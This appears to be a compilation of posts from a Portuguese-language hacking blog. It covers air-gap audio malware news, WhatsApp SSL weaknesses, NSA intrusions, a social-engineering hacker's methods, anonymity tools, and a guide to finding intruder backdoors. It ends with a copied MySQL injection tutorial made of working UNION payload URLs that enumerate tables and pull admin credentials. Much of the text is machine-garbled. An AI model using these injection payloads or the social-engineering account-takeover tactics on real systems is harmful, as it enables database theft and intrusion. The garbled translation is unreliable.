quarta-feira, 26 de fevereiro de 2014

MALWARE QUE FAZ TRANSFERENCIAS DE DADOS ROUBADOS USANDO SINAIS DE AUDIO INALDÍVEL

Se você acha que um computador que não está conectado a uma rede, não tem nenhum sticks USB ligado a ele e não aceita qualquer tipo de solicitações de conexão de eletrônicos são razoavelmente seguras contra hackers e de todo o malware, então você está errado 
Aqui temos algo atualização chocante que alguns cientistas alemães desenvolveram uma prova de conceito Malware protótipo, poderiam permitir que um hacker para infectar os computadores e outros dispositivos digitais usando apenas  sinais de áudio inaudível .
A capacidade de colmatar uma lacuna de ar pode ser um vetor de infecção potente. Imaginem, um ataque cibernético através de ondas sonoras de alta freqüência para infectar máquinas, onde os dados roubados também podem ser transferidos de volta ao atacante sem uma conexão de rede, soa muito aterrorizante?
Mas agora os pesquisadores alemães publicaram um artigo sobre a forma como o malware pode ser projetada para atravessar a abertura de ar através da transmissão de informações por meio de alto-falantes e gravá-la via microfone.
Ao invés de confiar em TCP-IP, eles usaram uma pilha de rede originalmente desenvolvida para a comunicação subaquática eo sinal foi propagada através do uso de um 
modem definido por software com base no projeto GNU Radio. 
Em um cenário baseado pirataria, " A vítima infectado envia todas as teclas gravadas para a rede mesh acústico secreta. Drones infectados encaminhar as informações keystroke dentro da rede secreta até o atacante é atingido, que agora é capaz de ler a entrada de teclado atual da vítima infectada de um lugar distante. "papel explicou.
Quando, há algumas semanas, um pesquisador de segurança Dragos Ruiu alegou de malware apelidadobadBIOS  permitido máquinas infectadas para se comunicar usando as ondas sonoras só, significa que os dispositivos são fisicamente desconectado de quaisquer redes, incluindo a internet, as pessoas diziam que ele era louco.
Em outro cenário, os pesquisadores utilizaram as ondas sonoras para enviar informações keystroke a um computador conectado à rede, que, em seguida, enviou a informação para o atacante via e-mail.
Embora a pesquisa não prova badBIOS reivindicações de Dragos Ruiu, mas mostra que, mesmo se o sistema for desligado de qualquer rede, ainda poderia ser vulnerável a ataques. No entanto, eu gostaria de apreciar  Dragos  dedicação sobre badBIOS pesquisa porque este conceito extraordinário foi introduzido pela primeira vez apenas por ele.Pesquisadores POC Malware é capaz de transferir dados a 20 bits por apenas a segunda, que é muito baixa, mas que ainda é capaz de transferir sua senha ou número de cartão de crédito para o hacker em poucos segundos.
Algumas medidas preventivas básicas se pode adotar para se proteger contra este tipo de malware são:
·         Desligar os dispositivos de entrada e saída de áudio do sistema.
·         Empregar filtragem de áudio que bloqueia faixas de alta freqüência.
·         Usando um Intrusion Detection Guarda áudio.


PORQUE VOCE DEVE PARA DE USAR O WHATSAPP

Se você ainda não ouviu até agora, o Facebook acaba de fazer o maior movimento de sempre, comprar oserviço de mensagens WhatsApp em um negócio no valor de cerca de US $ 19 bilhões. Isso é 19 vezes o que o Facebook pagou por Instagram há dois anos. O Serviço WhatsApp executado pela equipe de apenas 32 ​​engenheiros, processa mais de 50 bilhões de mensagens por dia, e cerca de 385 milhões de usuários ativos. aquisição WhatsApp também trouxe críticas fresco sobre segurança para os bilhões de mensagens entregues na plataforma. Pesquisador de Segurança na pretorianos Labs identificou várias questões de segurança relacionadas a SSL no aplicativo WhatsApp usando Projeto Netuno , uma plataforma de testes de segurança de aplicações móveis. " WhatsApp comunicação entre o telefone eo nosso servidor é totalmente criptografadas. Nós não guardamos o seu histórico de bate-papo em nossos servidores. Uma vez entregue com sucesso para seu telefone, mensagens de chat são removidos do nosso sistema . " Empresa disse em um post de blog .
Mas os pesquisadores descobriram que o WhatsApp é vulnerável a ataque Man-in themiddle porque o aplicativo não impôs pinagem SSL e, portanto, as credenciais do usuário podem ser facilmente roubados.Pinagem SSL evita que o usuário do aplicativo de ser uma vítima de um ataque feito por falsificação docertificado SSL . Pinagem SSL não será uma grande solução não é validado corretamente.
"O WhatsApp não realizar pinagem SSL quando estabelecer uma conexão confiável entre as aplicações móveis e serviços web de back-end. Sem SSL fixando imposta, um invasor pode man-in-the-middle a conexão entre os aplicativos móveis e serviços web back-end . Isso permitiria ao invasor capturar as credenciais do usuário, identificadores de sessão, ou outras informações confidenciais. "

WhatsApp está permitindo que seus servidores de back-end para usar esquemas fracos de 40 bits e criptografia de 56 bits, que podem ser facilmente quebrados usando força bruta ataque. " Este é o tipo de coisa a NSA adoraria ", disseram pesquisadores. equipe WhatsApp confirmou que eles estão trabalhando ativamente na adição de SSL fixar a sua aplicação, mas ainda não é suficiente para proteger a nossa privacidade. Facebook e WhatsApp certeza de que nada vai mudar após a aquisição e WhatsApp vai continuar a funcionar como um serviço independente, mas é que a declaração satisfeito? Pode ser que podemos confiar Facebook, Google, WhatsApp .. Mas nós realmente não podemos confiar no governo dos EUA e as agências de segurança, como a NSA, que não respeitam a nossa privacidade e liberdade de expressão. aplicativos de mensagens móveis muitas vezes usada para entregar sensível dados ou usado para comunicações pessoais e corporativos, de modo que os dados armazenados pelo fornecedor de serviços devem ser criptografados end-to-end, o que ainda não é o caso do WhatsApp.Mas há muitas outras aplicações de chat seguro e gratuito estão disponíveis, como Telegrama, Surespot, Threema, TextSecure, RedPhone etc, que você deve usar para manter seus dados privados e seguros, até WhatsApp não vai adotar a criptografia end-to-end.

NSA INFECTOU MAIS DE 50 MIL REDES DE COMPUTADORES

NSA tem a capacidade de rastrear " qualquer um, em qualquer lugar, a qualquer hora ". Em setembro, informou que como NSA e GCHQ plantada malwares via LinkedIn e Slashdot tráfego para cortar a maior empresa de telecomunicações Engenheiros da Belgacom.
Ontem, um  holandês jornal tenha  publicado um novo documento NSA segredo fornecida pelo ex-funcionário da inteligência  Edward Snowden
De acordo com o slide recém-exposta, NSA já infectou mais de 50 mil redes de computadores em todo o mundo com o software projetado para roubar informações confidenciais ou seja malware .

O slide de apresentação a partir de 2012 a administração da NSA, mostra um mapa do mundo com mais de 50.000 locais de destino, utiliza um procedimento chamado " Computer Network Exploração '(CNE) que pode secretamente instalar malware em sistemas de computador. O malware pode ser controlado remotamente e ser ligado e desligado à vontade.

A partir do site NSA descobrimos que, CNE inclui permitindo ações e coleta de inteligência através de redes informáticas que exploram os dados recolhidos a partir de sistemas de informação do alvo ou inimigo ou redes .

"Ciberguerra é uma ameaça muito real e pode causar problemas generalizados. É por isso que a Agência Nacional de Segurança precisa ser preparado por profissionais de Ciência da Computação que são altamente qualificados em operações de rede de computadores." O site diz.

Para realizar tais ataques ofensivos via operações da CNE, NSA empregou mais de mil hackers em uma unidade especial chamado TAO (operações de acesso sob medida) . Países alvo da unidade de hackers CNE inclui a China, Rússia, Venezuela e Brasil.


Muitos municípios têm agora as suas próprias unidades de Cyber ​​- incluindo China e holandês, mas suas ações são proibidas por lei. Oficialmente eles não podem executar operações como a NSA ea GCHQ pode fazer.

HACKER COSMO EXPLICA QUAIS FERRAMENTAS USAVA PARA INVASÃO

O hacker de conhecido Como "Cosmo a Deus" (Cosmo, o Deus, EM UMA tradução Livre) se tornou conhecido POR Ser a principal Mente POR Trás fazer Grupo UGNazi. Com somente 15 años de idade, o Jovem usou DIVERSAS táticas de engenharia social, parágrafo conseguir Dados that permitiram invasões Realizar um companhias Como a Amazon, Apple, AT & T, PayPal, AOL, Netflix, Network Solutions e Microsoft, OUTRAS entre.
O UGNazi si tornou conhecido POR TER FEITO alguns DOS principais Ataques DDoS de 2012, cujos alvos principais FORAM locais pertencentes a Instituições Financeiras e Órgãos do Governo norte-americano. Entre SUAS vitimas estiveram a NASDAQ, a CIA EO popular site 4Chan, Que Teve Seu tráfego desviado Durante alguns Minutos parágrafo uma Conta do Twitter pertencente EAo hackers.
Em maio dEste Ano, Cosmo usou SUAS Técnicas de para invadir UMA Agência de Cobranças, o Opaco LHE garantiu Acesso a 500 mil Números de CARTOES de Crédito. Completar Pará, elementos usou Seu Conhecimento parágrafos invadir Contas de Sites Como o Best Buy, Buy.com, Live.com (Opaco Engloba o Hotmail, Outlook ea Xbox LIVE), OUTROS entre.
O Jovem FOI Preso los Junho de 2012 JUNTO COM OUTRAS PESSOAS dezenas de acusadas de participarem de Atividades criminosas. Em entrevista à Wired, elementos Afirma Que da Sequer dez Certeza de cais Quais d'Orsay acusações existem elementos contra, POIs Perdeu a Conta de quantos Ataques elemento realizou Durante o ritmo Que Passou sem UGNazi.

Humanos: o elo fraco de QUALQUÉR Sistema

Cosmo revelação Opaco uma FERRAMENTA principais elementos Que da usava parágrafos conseguir invadir sândalo local ERAM SUAS Habilidades Sociais. Em Vez de recorrer de keyloggers UO To Us Link softwares Especializados los espionagem digital, muitas Vezes bastava Realizar algumas procuras los Sistemas de buscas e algumas ligações de para obter como Senhas Opaco garantiam Acesso irrestrito a sândalo SERVIÇO.
Para redirecionar o tráfego do 4Chan, Por Exemplo, Tudo Que da elemen precisava Das era Informations pertencentes a Matthew Prince, CEO do CloudFlare (Companhia Responsável POR fornecer o DNS fazer local). Apos obter o Número do Seguro social Não Executivo, o hacker de ligou par a AT & T e usou ESSA INFORMAÇÃO parágrafo Recuperar uma Senha Opaco príncipe usava los Sua Conta não Gmail - Feito ISSO, elementos obteve Acesso a Todas como Informations de Opaco precisava parágrafo Realizar o Ataque .


Segundo Cosmo, a Maior arma parágrafo hum hackers Descobrir como Informations de Opaco Precisa E mostrar Confiança e Conhecimento sobre hum Sistema UO alguma Pessoa. Muitas Vezes, elemento se passava POR UM Membro de UMA Empresa Como forma de obter logins e Senhas Opaco deveriam Permanecer confidenciais, Algo Que se mostrava algoritmo extremamente Fácil de Ser Feito.
"Você PODE invadir Praticamente QUALQUÉR Companhia se disfarçando Como hum Agente dela", Disse elementos enquanto exibia um Sorriso de Orgulho los Seu Rosto. "A maioria das PESSOAS CAIR Vai Nesse Truque uma Localidade: Não Ser Que tenham Sido treinadas parágrafo Localidade: Não Fazer ISSO. Mas a maioria das Empresas Localidade: Não FAZ ISSO ", comple o Jovem.
Segundo o hacker muitas Vezes o Processo de Invasão exigia Realizar Diversos contatos, porem OS obstaculos NUNCA SE REALMENTE mostravam difíceis de Serém superados.


NAVEGANDO NO ANONIMATO

 Como Ficar anonimo na internet SEM Ser Descoberto!

A Internet E hum Vasto Mundo de Informação e Conhecimento, porem Nesse Universo existem muitos sítios e Serviços Que querem saber Tudo sobre Voce. Navegando convencionalmente na web, e Possível Descobrir, Por Exemplo, o Ponto aproximado de SUA LOCALIZAÇÃO EO Que ESTA Sendo trafegado.

Se voce é paranoico UO Simplesmente trabalha com Coisas sigilosas Opaco necessitem Ocultar o Ponto de Origem e de Destino OU AINDA preza Muito Pela SUA privacidade, eis Que trago Hoje algumas DICAS de Como se tornar anônimo na internet atraves de alguns Programas Que Vao deixar SUA Navegação (Quase) Impossível de Ser rastreada e AINDA ajudará uma Baixar Arquivos los Redes P2P SEM permitir detectar sobre o Opaco o ARQUIVO se Trata.

Uma Vez fantasmas, Você. PODE vagar Pela Internet Livre e Sem Censura, visite sites restritos O geo, Assistir vídeos bloqueados e Investigar de Todos os Temas de impedimentos INTERESSE SEM do Governo Seu, SUA Escola, SUA universidade UO Seu Empregador. Um Exemplo Simples: Se hum ponto de Conteúdo, Como hum videoclipe da Música, Nao ESTA DISPONÍVEL los Seu País, FAÇA o login-no parágrafo hum dos nossos Servidores fóruns de Seu-País e se tornar Praticamente hum Habitante fazer País Respectivo. E Tao do Fácil Como ISSO.

PROGRAMAS ESPECÍFICOS PARA O ANONYMATO

Anônimo los Redes sem fio
Você. sabiá Que SEUS PRECIOSOS Dados correm Perigo AO USAR Redes Sem Fio Abertas available los Praticamente shoppings de Todos os, Aeroportos, Hoteis e muitos Lugares OUTROS? Sabendo fazer funcionamento fazer Protocolo USADO parágrafo se Acessar a internet, muitas PESSOAS PODEM OS analisar pacotes Opaco trafegam nessas Redes e Descobrir como Informations Que da Voce esta Trocando COM OS locais Opaco ESTA acessando.

Hostspot Escudo

Uma Maneira de se resolver ISSO E usando Sistemas de proxy, Túnel SSH OU AINDA UMA Rede VPN. Como NEM ISSO TEM Todo Mundo em Casa, e locais HÁ Programas that oferecem UMA Infraestrutura Completa parágrafo permitir Que Você. navegue com Segurança Pela web SEM NEM local Pelo Ser identificado e NEM POR sândalo espertinho Opaco esteja fuçando uma Rede na quali Voce esta Conectado. Um. DOS Destaques do Ramo E o Hotspot Shield Opaco oferece UMA Rede VPN gratuita parágrafo Você. USAR los pontos de Acesso Sem Fio.

Você. Só Precisa apertar hum Botão de para se tornar anônimo na internet e ter SUA Navegação Completamente criptografada Entre Você. EO local de Destino. ASSIM, QUALQUÉR hum Opaco Queirã sabre o Que Voce esta Conversando com o Servidor de Destino, Ficara frustrado POIs SUA Conexão ESTA Sendo realizada atraves de UMA segura VPN Rede. O Problema FICA POR Conta das propagandas Opaco suportam o SERVICO, mas ISSO E fácilmente burlável.

Tudo o Que Precisa Fazer Você. E Instalar o Hotspot Shield e USAR O Navegador Firefox com o complemento instalado AdBlock Plus. O Google Chrome Localidade: Não se Dá Muito Bem com o Programa e Localidade: Não costuma Bloquear como propagandas, portanto A Melhor Opção E Ficar com o Navegador da Mozilla. Uma Vez Conectado, o SUA Navegação na internet estara Protegida. O Programa E Compatível com o Windows e Mac como ATÉ SUAS versões Mais récentes. Localidade: Não HÁ limite de banda parágrafo Este SERVIÇO.


Anônimo via The Onion Router

TALVEZ Você. Localidade: Não Conheça ESSE SERVIÇO POR ESSE nome, mas elemento E o significado da sigla TOR. Essa Rede E Composta POR UM gigantesco number of túneis fornecidos POR PESSOAS Opaco apoiam o SERVIÇO E E USADO POR UM Enorme number of internautas, Empresas e Organizações Que necessitem de privacidade totais na Troca de Informações via internet.

Para Você. ter UMA ideia de Como E Praticamente Impossível sabre de Onde hum Pacote VEM OU parágrafo Onde elemento Vai, a CADA clique dado, um INFORMAÇÃO POR trafega Diversos túneis Diferentes. A Há UMA Troca alucinante de Caminhos de para um INFORMAÇÃO chegar Ate O Destino e ISSO Acaba impedindo Que se descubra uma Origem UO o Destino que Opaco Voce esta enviando uma hum Servidor. Porem, EM contrapartida, ISSO diminui levemente a VELOCIDADE da Navegação.

Pará USAR A Rede, Você. desen Baixar hum Cliente parágrafo Seu computador. PoDE Ser necessario hum Pouco de Conhecimento técnico de para configurar dependendo da version Escolhida, entao ha Qualquer oportunidade de servi hum Pouco Complicado Ficar anônimo Pela Rede TOR. A forma Mais Fácil E ATRAVES fazer Pacote Navegador Tor Opaco VEM com Tudo o Que E Necessario Para se conectar na Rede e Navegar de forma anônima. O Pacote inclui Ate O Firefox Portable Opaco JÁ VEM configurado com o TOR Botão e also FAZ buscas Pelo Google SSL.



Anônimo via Proxy
A Maneira Mais Fácil de se Acessar a web anonimamente E usando hum Opaco procuração E hum Servidor Pelo quali Todas como Informations Passam os antes de chegar AO Destino Opaco Localidade: Não Vai identificar voce é sim o Servidor Proxy fazer uma qualifi Saiu solicitação. O Mais Famoso e conhecido, ALÉM de Ser hum dos Mais Simples, E o Hide My Ass UO Esconda Meu Traseiro em bom português. Ele. oferece gratuitamente hum SERVIÇO de proxy, bastando Acessar o site de e DigiTar o ENDEREÇO ​​that deseja Acessa na barrinha.

Locais OS Nem Todos e Protocolos São Compatíveis com Ele, porem E UMA Boa pedida parágrafos Acessar uma maioria DOS nos sites available na internet. A Há also Serviços (alguns Pagos) Como anônimo VPN, e-mail anônimo, envio de Arquivos anônimo, os sites de proxy parágrafos Anonimo IP: Porta e referenciador anônimo (para Localidade: Não sabre de local quali Você. Veio).

Anônimo los Redes P2P
E Possível Baixar Arquivos de forma anônima ATÉ MESMO los Redes P2P, Como como de torrente. Usando como Ferramentas CERTAS, Você. PODE burlar Seu provedor de internet e evitar Opaco descubram o Que Voce esta baixando UO Que te impeçam de Baixar. Se desejar, PODE ATÉ Você. USAR A Rede TOR configurada corretamente parágrafo SERVIR de procuração anônimo parágrafo Seu Cliente torrent, mas Vou facilitar como Coisas.

A Há Programas e Maneiras Mais Específicas e fáceis de ter SUA Identidade oculta los Redes de compartilhamento peer to peer. Antes conhecido Como PeerGuardian e Hoje available Como PeerBlock, com elementos Você. PODE Baixar parágrafo Seu computador listas de Bloqueio Que te impedirão de Acessar DESTINOS conhecidamente Dados Como de Empresas e Organizações Que gostam de sabre Demais sobre SUA Vida online. Disso de Além, te protegerá de Redes de Anuncios e tambem de algumas Redes infectadas.

Ele. software bloqueará o Acesso de QUALQUÉR Programa do Seu computador AOS Endereços IPs presentes NAS listas Opaco São atualizadas frequentemente e de forma Automática Pelo. ASSIM Você. de sempre estara protegido e SUA privacidade Garantida. Apesar de SUA Vasta Cobertura fazer Sistema, o diretor FICA MESMO POR USO Conta da Proteção los Redes P2P. Falando Nisso, parágrafo obter o Melhor delas, Recomendo Baixar o Transmission that ESTA DISPONÍVEL oficialmente para Mac e Linux, mas also temperatura hum porto Excelente para o Windows. Ele. temperatura Suporte Nativo a listas de Bloqueio, mas de para apenas UMA.

O PeerBlock suporta Muito Mais listas de e impedem o Opaco Transmissão Acessem OS IPs bloqueados. Porem parágrafo completar SUA Segurança e privacidade, nada Melhor do Que criptografar o Opaco sai EO Que Entra. Por ISSO, nenhuma transmissão, VA los Editar> preferencias por e Criptografia los, DeFina Exigir Como na Imagem Acima (da Versão para Windows). ASSIM, Seu provedor de internet Localidade: Não Tera Como saber o Que Voce esta baixando NEM Como impedimento-lo de Baixar. Nota Opaco ISSO PODE Fazer com Que Você. Localidade: Não se conecte a algumas Fontes, mas o Dano na VELOCIDADE OU Qualidade da Transferência E Mínimo UO Simplesmente inexistente.


                  PARA ESSE Finalizar Troco * - *

O Chrome de sempre cria UMA ID Única parágrafo CADA UM DOS SEUS USUÁRIOS e apesar de Nao identifica-lo pessoalmente, permite saber Tudo o Que Você. FAZ nenhuma Navegador. Disso de Além, nos TERMOS Diz Que alguns Dados enviados Pelo Chrome Direito Dão AO Google de EUA-los. Locais ha that bloqueiam o Acesso de Usuarios dEste Navegador devido a SUA falha na privacidade. Apesar Disso, devido AO Código Fonte Aberto, Ha opções Opaco respeitam ESSE Importante Detalhe Como o ChromePlus EO Ferro navegador.

Outra Coisa Que E CADA Vez Mais TEMOS Nossa privacidade posta em Jogo. Redes sociais pipocam a CADA dia EO Google E UMA Empresa Muito USADA e Opaco sabidamente adora Conhecer hum Muito Pouco Mais sobre SEUS USUÁRIOS. Portanto, se voce é hum internauta normais Opaco nao tem algoritmo extremamente sigiloso parágrafo compartilhar com PESSOAS Escolhidas a dedo, de nada adianta USAR Meios de se Esconder na web se Você. informações Tudo sobre SUA Vida em Redes sociais.


Mas FICA aí uma dica de para Todo Mundo Que Quiser passar Pelo Menos Um Dia SEM Revelar ao Mundo SUA virtuais Verdadeira identidade.Apreciem com Moderação! uu

OBS: <>>>> Conhecimento Localidade: Não E crime, basta saber USAR.

Achando Rastros de Uma Invasão

Nao se preocupe… sera muito facil encontrar rastros deixados por um lammer. primeiro porque lammers soh sabem fazer o que as receitas mostram, eles nao se preocupam em variar as tecnicas usadas. entao o que voce vai encontrar vai ser exatamente como esta nos txts. vamos ver…

a backdoor mais lamah possivel voce pode encontrar no /etc/passwd.

[root@localhost /etc]# grep “:0:0:” /etc/passwd
root:x:0:0:root:/root:/bin/bash
lamah::0:0::/:/bin/sh


ok… achamos nosso lammer… vamos ver c ele nao deixou outras backdoors aki…outras 2 backdoors comums sao suidshell e inetdaemon. para acha-las…

[root@localhost /etc]# grep “sh” /etc/inetd.conf
courier stream tcp nowait root /bin/sh sh -i


uma variacao desta pode ser…

[root@localhost /etc]# grep “\-i” /etc/inetd.conf
swat stream tcp nowait root /usr/sbin/swat swat -i


veja q o servico esta chamando o /usr/sbin/swat com os mesmos atributos do /bin/sh. vamos conferir para ver c swat == sh.

[root@localhost /etc]# ls /bin/*sh
/bin/ash /bin/bsh /bin/ksh /bin/tcsh
/bin/bash /bin/csh /bin/sh /bin/zsh
[root@localhost /etc]# cmp -c /bin/ash /usr/sbin/swat
/bin/ash /usr/sbin/swat differ: char 25, line 1 is 20 ^p 220 m-^p
[root@localhost /etc]# cmp -c /bin/bash /usr/sbin/swat
[root@localhost /etc]#


aha!!! soh pra quem nao sabe… cmp serve para comparar arquivos. comente a linha no inetd.conf e reinicie o inetd. para achar suidshells use:

[root@localhost /]# find / -type f \( -perm -04000 -o -perm -02000 \) -user root
vai ser exibido uma lista com todos os arquivos suids com owner root. cabe a voce saber o que eh programa do linux e o que foi criado pelos usuarios. uma dica… eh comum deixar as suidshells no mesmo diretorio onde eles deixam seus programas tais como xploits, sniffers e clearlogs. outra coisa… os diretorios usados sao na maioria das vezes os com permissao de all+rwx como /tmp e /var/tmp ou nos homedirs. tambem ha a posibilidade deles criarem os dir por issu voce pode procurar por estes com o comando:
[root@localhost /etc]# find / -type d -perm 0777
outro detalhe… esses lammers vao provavelmente rodar um portscan qualquer no seu host por issu voce pode acha-lo no log do syslogd (/var/logs/messages) caso ele nao tenha sido modificado. procure tambem nos ~/.history’s e nos wtmp, utmp e lastlog. lammers nunca dao muita importancia aos logs.
2. hacker beginner.
este vai se parecido com o lammer quanto ao fato dos diretorios… ele precisa de um lugar para por seus arquivos. ache o diretorio e voce acha o hacker. mas neste caso isto pode se tornar mais dificiu. caso o diretorio criado seja rwxr-xr-x como acha-lo??? procure por sources de programas e se nao encontra-los tente usar:
[root@localhost nix]# strings a.out |grep /bin/sh
/bin/sh

issu serve para encontrar xploits ja que todos xploits tem esta string pois eh o que eles executam. procure-os nos homedirs e tmps tambem. arquivos ocultos sao muito usados. existem programas q fazem busca de sniffers por devices. rode-o e veja se nao encontra nada suspeito. rode tambem programas que procuram por logs apagados pelo zap. issu eh salvo caso o hacker tenha usado a minha versão do zap alterado. =)
um hacker nao lamer no minimo iria colocar uma binder no seu sistema. para acha-lo use:
[root@localhost /root]# lsof -i
com isso sera listada todas as portas que estao sendo usadas. procure por algo suspeito como
a.out 3454 root 3u inet 84061 tcp *:31337 (listen)
3. hacker eleet.
esquece. se o hacker q ow nou vc for mesmo eleet torna-se praticamente impossivel de voce encontra-lo. mas existe certas prevencoes que vc pode fazer para detectar a presenca dele. uma das coisas eh fazer backup dos logs toda a vez que alguem se logar. crie uma particao somente para os logs.
coloque no /etc/.bash_profile:
#mude aki de acordo com a particao
mount /dev/hda2 /mnt
d=`date –date “\`date |cut –bytes=5-10\`” +%j`
cp -f /var/run/utmp /mnt/utmp.$d
cp -f /var/log/lastlog /mnt/lastlog.$d
cp -f /var/log/wtmp /mnt/wtmp.$d
cp -f /var/log/messages /mnt/messages.$d
cp -f ~/.bash_history /mnt/history.$user.$d
umount /mnt

pronto. toda a vez q vc logar os arquivos de logs serao copiados para a particao indicada. sera criado um arquivo diferente para cada dia, para que voce possa comparar os dados e encontrar alguma alteracao feita.

INJEÇÃO DE SQL

[Portuguese] MySQL Injection Tutorial

                 _____ _       _    _    _       _  
                |  __ (_)     | |  | |  | |     | | 
                | |__) | _ __ | | _| |__| | __ _| |_
                |  ___/ | '_ \| |/ /  __  |/ _` | __|
                | |   | | | | |   <| |  | | (_| | |_
                |_|   |_|_| |_|_|\_\_|  |_|\__,_|\__|
                               PinkHat (Un)Security Team 2009


Titulo : MySQL Injection Tutorial
Autor  : fvox (Júnior)
Data   : 11.02.2009

##########################
 Índice - MySQL Injection
##########################

                SQL Injection
                               [0x00] - Sobre o ataque
                               [0x01] - Onde acontece
                               [0x10] - Verificando a vulnerabilidade
                               [0x11] - Atacando!
                               [0x12] - Capturando dados
                               [0x13] - MySQL Dump
                               [0x14] - Burlando filtros
                              
                Blind Injection
                               [0x00] - Sobre o ataque
                               [0x10] - Verificando a vulnerabilidade
                               [0x12] - Achando uma tabela
                               [0x13] - Achando uma coluna
                               [0x14] - Capturando dados


#########################
 [0x00] - Sobre o ataque
#########################

                Antes de começar o tutorial, eu recomendo que você tenha uma noção sobre SQL, nem que seja
uma noção mínima para não ter dificuldade em entender o funcionamento de um ataque em um site
vulnerável a (Blind) MySQL Injection
                O único requerimento para este ataque é um browser comum. Inicialmente voc?s não precisarão
de scanners ou tools para explorar a falha, portanto, procure ENTENDER o que está escrito aqui
pois creio que atualmente, esta é a falha mais encontrada na internet, porém não é a mais fácil
de explorar e fazer o deface em um web site. Vocês não terão uma phpshell em mãos onde só irão
clicar no botãozinho e a phpshell altera "automaticamente" a index de um site, como acontece em
falhas de include (Local File Inclusion e Remote File Inclusion).


########################
 [0x01] - Onde acontece
########################

                Como alguns de vocês devem saber, este tipo de ataque não depende da linguagem de programação
do script (a correção da falha depende), e sim do banco de dados SQL, ou seja, você pode encontrar
a vulnerabilidade em um site feito em PHP, mas também pode encontrar em um site feito em ASP.
                No caso desta matéria, irei abordar os ataques em um servidor MySQL e PHP. A falha também não
depende do tipo da requisição, ou seja, é possível encontrar vuln em requests GET, POST, e o que
seja manipulável pelo cliente. Nesta matéria eu irei exemplificar com requisições GET, já que é
a mais manipulável e a melhor para usar nas explicações. Eu usarei um sistema de notícias que
pega o ID da notícia via GET durante toda a matéria.
               

-------------------------------
                SQL INJECTION ATTACK
-------------------------------
               
########################################
 [0x10] - Verificando a vulnerabilidade
########################################

                SQL Injection só é possível quando o site te informa qual o erro que o banco de dados caso
não seja possível fazer a consulta no banco de dados. Por exemplo:

<?php
$id = $_GET['id'];
$q = "SELECT * FROM noticias WHERE id = '$id'";
$r = mysql_query($q) or die(mysql_error());
?>
               
                Como vimos ali, caso não seja possível enviar a consulta ao MySQL, o script é
interrompido exibindo a mensagem de erro da operação enviada ao MySQL. Se eu entrar em
http://www.fvox.com/noticias.php?id=10%27 (lembrando que %27 equivale a uma aspa simples ').
                A query a ser enviada seria a seguinte:
SELECT * FROM noticias WHERE id = '10''

                A aspa inserida na URL iria modificar a sintaxe da consulta, então a função mysql_error()
retornaria algo parecido com:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ''10''' at line 14

                É claro que o servidor pode emitir outros erros, mas desde que exiba um erro, já é
alguma coisa para que você possa realizar seus penetration tests com grande esperança,
o que te motiva bastante.


####################
 [0x11] - Atacando!
####################

                Depois de ver que o site está vulnerável, o próximo passo é descobrir a quantidade de
colunas da tabela noticias. Isso é possível utilizando a cláusula "order by", que não irei
explicar para que serve porque como já disse no início da matéria, estou escrevendo para
usuários que já tem experiência com MySQL e não para o Sander e outros saírem por aí pixando
o site de todo mundo, AUHAUHAUHAU.

SELECT * FROM noticias WHERE id = '$id' order by 1/* Ignora o resto da query

http://www.fvox.com/noticias.php?id=10 order by 1/* Não deu erro
http://www.fvox.com/noticias.php?id=10 order by 2/* Não deu erro
http://www.fvox.com/noticias.php?id=10 order by 3/* Não deu erro
http://www.fvox.com/noticias.php?id=10 order by 4/* DEU ERRO! Unknown column '4' in 'order clause'

                É só ir dando order by até dar erro, cada site em um número de colunas diferentes, não
pensem que vocês irão realizar o ataque com quatro colunas em todos os sites.
                Com base nos erros enviados pelo site, pudemos perceber que a tabela noticias do nosso site
imaginário possui três colunas, e será com elas que iremos trabalhar.

###########################
 [0x12] - Capturando dados
###########################

                Agora iremos utilizar o operador UNION, que também não irei explicar para que serve...
Essa porra tá com 110 linhas e eu ainda nem cheguei na metade, puta que pariu.

SELECT * FROM noticias WHERE id = '$id' union all select 1,2,3--

http://www.fvox.com/noticias.php?id=-1 union all select 1,2,3--

                Quando você injetar isso na URL, o site irá imprimir um "número" na tela, seja ele 1, 2
ou 3. Se o site mostrou um 2 na tela, substituia o número 2 por "@@version". O site irá
imprimir a versão do banco de dados na tela.
                Se colocarmos database() no lugar do 2, o site irá imprimir o nome do banco de dados
em que a tabela está.

http://www.fvox.com/noticias.php?id=-1 union all select 1,@@version,3--
5.1.30-gpl-log
http://www.fvox.com/noticias.php?id=null union all select 1,database(),3--
fvox (digamos que o nome do db imaginário seja fvox, LOL)

                Agora vem uma parte chata. Você terá que chutar o nome da tabela! Isso mesmo, você
terá que adivinhar o nome da droga da tabela. Você pode tentar admin, users, usuarios,
membros, cadastros, administrador, etc.
                Caso a versão do MySQL seja 5.xxxx, você pode recorrer a uma técnica chamada
MySQL Dump, onde você consegue o nome das tabelas e colunas por meio da tabela
information_schema. Se a versão do MySQL for 4 e você não conseguir adivinhar
o nome da tabela, desista do site. Como eu usei a versão 5.1.30-gpl-log como exemplo
desta matéria, eu irei abordar como "dumpar" as tabelas e colunas mais para frente.

http://www.fvox.com/noticias.php?id=-1 union all select 1,2,3 from users-- Table
'fvox.users'doesn't exist
http://www.fvox.com/noticias.php?id=-1 union all select 1,2,3 from admin-- Não deu erro!

                Deste modo, chegamos a conclusão de que há uma tabela chamada admin, que certamente
guarda dados do administrador e que este tutorial está ficando muito grande pro meu gosto.
                Agora que descobrimos a tabela, iremos novamente nos foder para descobrir o nome das colunas
para pegar as informações do admin.

http://www.fvox.com/noticias.php?id=-1 union all select 1,user,3 from users-- Erro
http://www.fvox.com/noticias.php?id=-1 union all select 1,concat_ws(0x3a,username,password),3 from
users-- FUNFOU!
fvox:536facb9b05a48e2adb15866353b62ee

                A função concat_ws é só para organização mesmo. O "ws" no nome da função significa with
separator. Todos as colunas no parametro da função serão exibidas na página com o separador ":".
                Neste caso, o site imprimiu os dados da coluna USERNAME e coluna PASSWORD com o separador.


#####################
 [0x13] - MySQL Dump
#####################

                O famoso "Dump" é uma técnica disponível apenas em servidores que utilizam MySQL na sua
versão 5.xxx. A utilidade do Dump é que você não precisará ficar chutando o nome das tabelas
e nem o nome das colunas, graças ao information_schema. Primeiramente, vamos listar o nome
das tabelas do banco de dados:

http://www.fvox.com/noticias.php?id=-1 union all select 1,table_name,3 from information_schema.tables--

                Para obter o nome das colunas é quase a mesma coisa:
               
http://www.fvox.com/noticias.php?id=-1 union all select 1,column_name,3 from information_schema.columns--
http://www.fvox.com/noticias.php?id=-1 union all select 1,column_name,3 from information_schema.columns
where table_name='admin'--



###########################
 [0x14] - Burlando filtros
###########################

